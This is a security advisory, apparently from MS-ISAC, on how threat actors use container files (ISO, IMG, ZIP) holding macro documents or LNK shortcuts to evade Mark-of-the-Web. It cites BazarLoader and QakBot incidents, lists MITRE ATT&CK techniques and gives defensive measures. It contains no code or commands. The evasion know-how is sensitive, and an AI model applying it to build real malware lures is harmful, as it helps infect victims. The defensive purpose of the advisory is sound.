Cyber Threat Actors Evading MOTW for Malware Delivery

Screenshot of a file downloaded from the internet. "ZoneID=3" denotes that the file originates from the internet. Therefore, it is a MOTW.

In response to Microsoft's move, some CTAs have changed their methods for gaining initial access and are favoring container files to circumvent Microsoft’s move. At this point, this shift in technique appears limited to a small set of CTAs, but the wider CTA ecosystem will likely adopt it in time.

Recent campaigns using this technique rely on malspam emails with malicious attachments or thread hijacking to increase the chances of victims opening the attachment. The malicious attachments are often container files[1], such as IMG, ISO, RAR, or ZIP files, that hold malicious Microsoft office documents, DLLs, a Windows shortcut or link (LNK) file, or Microsoft Windows Installer (MSI) files.

From 2021-2022, the MS-ISAC observed a 173% increase in incident response cases and submissions to its Malicious Code Analysis Platform (MCAP) involving container files. Furthermore, the MS-ISAC witnessed a 280% increase in container files holding LNK files during that same period. Current malware campaigns using these techniques include BazarLoader, Bumblebee, Emotet, IcedID, NjRAT, QakBot, and RedLine Stealer.

Two Methods of MOTW Evasion

Since the beginning of the year, the MS-ISAC has detected CTAs using two main methods to evade MOTW. In the first method, CTAs use container files to prevent their malicious Office document from receiving a MOTW attribute. In the second method, CTAs avoid using malicious Office documents and instead use a container file that contains a malicious LNK file.

Method #1: Container File with Office Document

CTAs are utilizing container files harboring malicious Office documents (e.g. Word, Excel,), which execute the malware when macros are enabled. These malicious container files reach victims through malspam campaigns or from victims visiting a malicious website. The container file itself has the MOTW, but the files and documents inside the container file don't. These contents are also commonly zipped, enabling them to evade Microsoft’s security scanning features.

When a container file is unzipped and opened, the computer believes the files inside originated locally and not from the internet because the contents did not receive the MOTW. For this attack to execute fully, the end user must open the document and enable macros, which will then prompt the execution of the attack.

In an MS-ISAC incident response case, an email delivered BazarLoader in an attached password-protected ZIP file that contained a malicious Microsoft Word document. Once the Word Document was extracted and opened along with macros enabled, the document reached out to a malicious domain and downloaded an HTA file. Once this file executed, it downloaded a malicious DLL that masqueraded as a JPG file.

Method #2: Container File with LNK File

Like the first method, the second method utilizes zipped container files to bypass typical security restrictions. The difference is that it includes an LNK file, which is a Windows shortcut used to open another file or application. When the end-user clicks on the LNK file, it typically invokes another application such as Command (CMD), PowerShell, or MSHTA, which is then used to download malicious content. CTAs abuse these native tools to navigate to malicious URLs that are hardcoded into the command to download malicious content such as DLLs or executables as their main payloads. Once LNK files are executed, CTAs can perform reconnaissance on the victim machine by gathering the MAC address, machine ID, and serial number.

In separate MS-ISAC incident response case, CTAs delivered QakBot’s payload to a victim via email with an attached ZIP file that contained an IMG file using the same name. Double clicking natively mounted the IMG file, at which point in time the victim was presented with three files: a DLL, a LNK, and a Microsoft Word Document. The LNK file executed the malicious DLL, while the Word document reached out to a hardcoded IP address after macros were enabled.

MITRE ATT&CK Patterns Observed

Initial Access
T1566.001 Phishing: Spearphishing Attachment

Execution
T1204.002 User Execution: Malicious Link

Enterprise
T1218.005 System Binary Proxy Execution: Mshta
T1059.001 Command and Scripting Interpreter: Powershell

How to Defend Against MOTW-Evasive Campaigns

To harden their networks against the techniques discussed above, organizations must put measures in place to defend against suspicious emails. This includes providing employees with security awareness training around phishing attempts, creating a suspicious email policy for all personnel, marking all external emails with a banner, setting up filters at the email gateway for known malspam indicators, and implementing DMARC. These controls will make it more difficult for CTAs to succeed in getting a malicious email through to a work email account's inbox.

Organizations also need to ensure that they have measures in place that make it more difficult for CTAs to deliver their malware if a suspicious email gets through. First, they can use CIS Critical Security Control 2 to create application allowlists and thereby prevent the installation/execution of unauthorized software. Second, they should disable macros and enable logging. Third, they should reduce the possibilities for lateral movement and Living off the Land (LotL) techniques by implementing the principle of least privilege, PowerShell signed scripts, and execution policies on PowerShell.

U.S. State, Local, Tribal, and Territorial (SLTT) government organizations can obtain even more assistance in the fight against MOTW evasion by joining the MS-ISAC. Membership unlocks access to cybersecurity tools and resources that they can use to proactively block network traffic from connecting to known malicious web domains, block unauthorized activities at the endpoint, identify and report malicious events, and share indicators of evolving cyber threats.